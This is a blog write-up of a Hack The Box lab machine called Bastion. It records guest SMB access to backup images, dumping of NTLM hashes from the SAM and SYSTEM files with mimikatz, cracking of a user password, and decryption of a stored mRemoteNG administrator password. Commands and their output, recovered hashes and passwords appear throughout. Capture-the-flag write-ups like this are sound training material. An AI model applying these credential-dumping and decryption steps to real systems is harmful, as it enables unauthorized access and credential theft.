Hackthebox | Bastion Writeup

ncpd
ncpd
Sep 10 · 4 min read

Bastion was an easy rated Windows box from hackthebox, including challenges like recovering credentials from VHD images on an SMB share to mRemoteNG vault software exploitation.

Enumeration

Bastion matrix

Like every box, we start by adding Bastion (10.10.10.134) to our /etc/hosts file as bastion.htb . We then run an nmap scan on it to get the results below.

root@kali# nmap -sC -sS -o scan bastion.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-27 16:40 EDT
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.34s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

We get SSH (port 22), Netbios (ports 135/139) and SMB (port 445). The version for OpenSSH (7.9) is recent (2018) and rarely used as a vector of attack on CTFs, no time to lose on that one. Enumerating SMB shares without account gets nothing but is allowed with any other random username. Enumerating with smbmap get the following results.

root@kali# smbmap -H 10.10.10.134 -u anyusername
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
Backups READ, WRITE
C$ NO ACCESS
IPC$ READ ONLY

We can now try to connect to the Backups share using smbclient to see a note.txt file saying to not transfer backups over the network as the VPN is too slow.

root@kali# cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Under WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 directories, we can find multiple files and 2 VHD files, which are the same as virtual hard drives. The easiest way to explore that files for me was to fire up my Windows VM, connecting to HTB VPN, then mounting it as it is natively supported with Windows. Once mounted, it looked like we had a whole Windows system backup there.

Windows Registry Hashes Dump

On Windows systems, passwords hashes can be accessed with 2 files (locked while the system is running, but not when it’s mounted), which are SAM and SYSTEM, located under C:\Windows\system32\config . Using mimikatz, we can get the hashes from that files.

mimikatz # lsadump::sam /system:SYSTEM /sam:SAM
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3aRID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : L4mpje
Hash NTLM: 26112010952d963c8dc4217daec986d9

A quick hash crack on hashkiller.co.uk gives us bureaulampje as the password for l4mpje user. We can then ssh as L4mpje with this password, and grab the user flag on the desktop.

root@kali# ssh L4mpje@bation.htb
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

Privilege Escalation

Starting off by listing installed software in C:\Program Files (x86) , mRemoteNG stood out. I decided to look at the user data contained in AppData\Roaming\mRemoteNG , to find out an xml file named confCons.xml , containing the application encrypted passwords.

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ..................................
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
..................................
</mrng:Connections>

When I did Bastion I searched for a way to decrypt mRemoteNG passwords and found haseebT’s repo on github containing a nice python script to decrypt it. You can find it here. Feeding it the encrypted passwords gave us a new password, which is the Administrator one.

./mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
thXLHM96BeKL0ER2

There’s no more work on this one as we can login in ssh as Administrator and grab the root flag.

root@kali# ssh administrator@bastion.htb
administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>

I really liked this box as I had to work with mimikatz for the first time and learn Windows authentication system. I find myself better navigating on a Unix system compared to Windows so I still need to learn using powershell and other boxes. I hope you enjoyed this one, feel free to leave a comment and follow me.

Stay tuned for more articles like this one !

Happy hacking ! Nicolas (@ncpd)

ncpd

Written by

ncpd

Engineering student passionate about tech, information security and powerlifting.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade